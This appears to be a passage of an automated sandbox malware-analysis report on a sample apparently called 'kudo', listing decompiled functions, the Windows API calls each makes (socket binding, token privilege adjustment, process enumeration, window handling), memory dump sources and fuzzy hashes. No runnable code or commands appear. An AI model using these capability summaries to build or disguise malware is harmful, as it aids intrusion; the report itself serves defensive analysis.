                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                      • Instruction ID: 84c948961cffa5fd0bc659562d5c0aae2d684c2a8b0919fd630e8c851c8a198f
                                                      • Opcode Fuzzy Hash: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                      • Instruction Fuzzy Hash: 3F21D0706006049FDB10EF68CC45A6EBBA9FF48320F148168E95AE73D6D770ED11CB52
                                                      Function 00815520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • _memmove.LIBCMT ref: 00850258
                                                      • _memmove.LIBCMT ref: 0085036D
                                                      • _memmove.LIBCMT ref: 00850414
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1300846289-0
                                                      • Opcode ID: a7168bc0816047087c17700eb7dbd7e290f5d571b587c3e9898ba4cd191ebb6a
                                                      • Instruction ID: fe7fbc4ce159b3f34406fb33bcfc77d00fd6c7679edda5011ab0bc1c309163c7
                                                      • Opcode Fuzzy Hash: a7168bc0816047087c17700eb7dbd7e290f5d571b587c3e9898ba4cd191ebb6a
                                                      • Instruction Fuzzy Hash: E002B2B0A00619DFCF04DF68D981AAE7BB5FF84304F148069E806DB395EB35D994CB96
                                                      Function 00801287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008019FA
                                                      • GetSysColor.USER32(0000000F), ref: 00801A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 00801A61
                                                        • Part of subcall function 00801290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008012D8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ColorDialogNtdllProc_$LongWindow
                                                      • String ID:
                                                      • API String ID: 591255283-0
                                                      • Opcode ID: 681cac72ed16bf583282a84b786f451d5f3190dfb047efa3405752aecb386341
                                                      • Instruction ID: 488c647a4c0fcef4aa53a67b87c324649223aeeb94dfbcf8ed4a78b5a18f91c9
                                                      • Opcode Fuzzy Hash: 681cac72ed16bf583282a84b786f451d5f3190dfb047efa3405752aecb386341
                                                      • Instruction Fuzzy Hash: 97A158B1212568BEEF79AB6C8C5CE7F395CFB81769F14011AF602D61D2DB209D4093B2
                                                      Function 00876747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00877D8B: inet_addr.WS2_32(00000000), ref: 00877DB6
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0087679E
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008767C7
                                                      • bind.WS2_32(00000000,?,00000010), ref: 00876800
                                                      • WSAGetLastError.WS2_32(00000000), ref: 0087680D
                                                      • closesocket.WS2_32(00000000), ref: 00876821
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: e5119851ace8896fefc78656496b34773353d292484ab8bd54607b229abcc26d
                                                      • Instruction ID: 18f534087b3e1c68dfb9240218cfc3b90e577338ce2e53644526bf9297c6770e
                                                      • Opcode Fuzzy Hash: e5119851ace8896fefc78656496b34773353d292484ab8bd54607b229abcc26d
                                                      • Instruction Fuzzy Hash: 8641B475600614AFDB90AF288C86F6E77A8FF45754F04C568FA99EB3C3DA709D008792
                                                      Function 00885376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: b54226e31160b969190ef7738b4dc44dedd877d1ff79a0352b8b901c40f670cb
                                                      • Instruction ID: e29425127d7b91ff0a94f5e37b75eeaa898bf358b1677887daaeddddb5b54549
                                                      • Opcode Fuzzy Hash: b54226e31160b969190ef7738b4dc44dedd877d1ff79a0352b8b901c40f670cb
                                                      • Instruction Fuzzy Hash: 9A11E771300911AFEB217F2ADC44A6E7B99FF457A1B408438F945D3342DB70DD0187A5
                                                      Function 008580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008580E0
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 47921759-0
                                                      • Opcode ID: 2b3c96d036781a0eee559104f79ba26b32971cfef3b996ff5cb703ea0d0a495b
                                                      • Instruction ID: 97376fd5a3fc7eeb3e087e33b450205f477fbfcb3593e9092c900bf8f8d881dc
                                                      • Opcode Fuzzy Hash: 2b3c96d036781a0eee559104f79ba26b32971cfef3b996ff5cb703ea0d0a495b
                                                      • Instruction Fuzzy Hash: 78F06235280704EFEB114FA9EC8DE673BACFF49755F100026FA45D6151DB619C45DB60
                                                      Function 0086C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0086C432
                                                      • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086C44A
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • CoUninitialize.OLE32 ref: 0086C6B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: 8b90488796c988278d8709c13f9319306381dd061553074259a7b6975a3a4185
                                                      • Instruction ID: d31c176cdaf6069543c4937eeac06745050f772adc6a2d5149f79187079f0016
                                                      • Opcode Fuzzy Hash: 8b90488796c988278d8709c13f9319306381dd061553074259a7b6975a3a4185
                                                      • Instruction Fuzzy Hash: 91A139B1104205AFD740EF58CC81EABB7E8FF95354F00492DF595C72A2EB71AA49CB62
                                                      Function 00813030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      • Opcode ID: 885b098bd72eec9a1932ddc01b5fce06e1c92e030cec7846b298d6775c8bdfa2
                                                      • Instruction ID: d91ad1df446a46d448fd620803d062ef6fbd85d29fe5835c0136ae3ee8cb35ed
                                                      • Opcode Fuzzy Hash: 885b098bd72eec9a1932ddc01b5fce06e1c92e030cec7846b298d6775c8bdfa2
                                                      • Instruction Fuzzy Hash: 592258716083049BD724DF18D881BAAB7E8FF85314F10492DF99AD7291EB71E984CB93
                                                      Function 0087EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0087EE3D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0087EE4B
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0087EF0B
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087EF1A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: f47bbadf94f096a5dd27d3234d9144f646e58290eb229c2b100cbe2bd23af905
                                                      • Instruction ID: f6b2650bd595956b1dd550f621cf67e82b2882e659325a4047cea71c751aec4e
                                                      • Opcode Fuzzy Hash: f47bbadf94f096a5dd27d3234d9144f646e58290eb229c2b100cbe2bd23af905
                                                      • Instruction Fuzzy Hash: F2516B715047119FD350EF28DC85A6BBBE8FF98710F10492DF995D62A2EB70E904CB92
                                                      Function 0088C498 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetCursorPos.USER32(?), ref: 0088C4D2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088C4E7
                                                      • GetCursorPos.USER32(?), ref: 0088C534
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0083B9AB,?,?,?), ref: 0088C56E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                      • String ID:
                                                      • API String ID: 1423138444-0
                                                      • Opcode ID: 5003149ee99211e33946070234e634be9ae74fbafd223eb138199294e708cb88
                                                      • Instruction ID: bc47077d2176e0b453198cb0fc6076999408383a28a7a18d46b511d8f72f335e
                                                      • Opcode Fuzzy Hash: 5003149ee99211e33946070234e634be9ae74fbafd223eb138199294e708cb88
                                                      • Instruction Fuzzy Hash: 41316D35600458AFCF25DF98CC98EEA7BB9FB49310F444169F905CB2A1C731AD90DBA4
                                                      Function 00801290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008012D8
                                                      • GetClientRect.USER32(?,?), ref: 0083B5FB
                                                      • GetCursorPos.USER32(?), ref: 0083B605
                                                      • ScreenToClient.USER32(?,?), ref: 0083B610
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                      • String ID:
                                                      • API String ID: 1010295502-0
                                                      • Opcode ID: 8b7712f9e48052f9223b2f9c3fbb6b106ed974187372de8b49a0d89df31d38a2
                                                      • Instruction ID: a00317985cf58332d77ee6a391be0450d080f4ad62023f72da2a810fd05d189d
                                                      • Opcode Fuzzy Hash: 8b7712f9e48052f9223b2f9c3fbb6b106ed974187372de8b49a0d89df31d38a2
                                                      • Instruction Fuzzy Hash: D5112235A00019EFCF10EFA8DC899AE77B8FB15310F400566FA11E7281D730BA918BA6
                                                      Function 0085E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0085E628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: 577cb3083fa2585eae80ce71d1829099cc9d993af9655344b355515b01df7d5e
                                                      • Instruction ID: 3f285f32020cd43c63ccb44c8bab95b05e08a124c9a88e7d8130aab3c81e2937
                                                      • Opcode Fuzzy Hash: 577cb3083fa2585eae80ce71d1829099cc9d993af9655344b355515b01df7d5e
                                                      • Instruction Fuzzy Hash: 3D322675A007059FDB28CF29C48196AB7F1FF58320B15C56EE89ADB3A1E770EA45CB40
                                                      Function 0086B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B40B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0086B465
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0086B4B2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: dbe341d72a2dbbbd1953337f87e07c1a391288970de70557cfa54593b850242a
                                                      • Instruction ID: 05be865196f355cb29ff96d233350778810c8c344070a2695ca76b561c61fc14
                                                      • Opcode Fuzzy Hash: dbe341d72a2dbbbd1953337f87e07c1a391288970de70557cfa54593b850242a
                                                      • Instruction Fuzzy Hash: 0A217175A00108EFCB00EFA9DC85AEDBBB8FF49314F1480A9E945EB352DB319955CB51
                                                      Function 008587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                      • GetLastError.KERNEL32 ref: 00858865
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
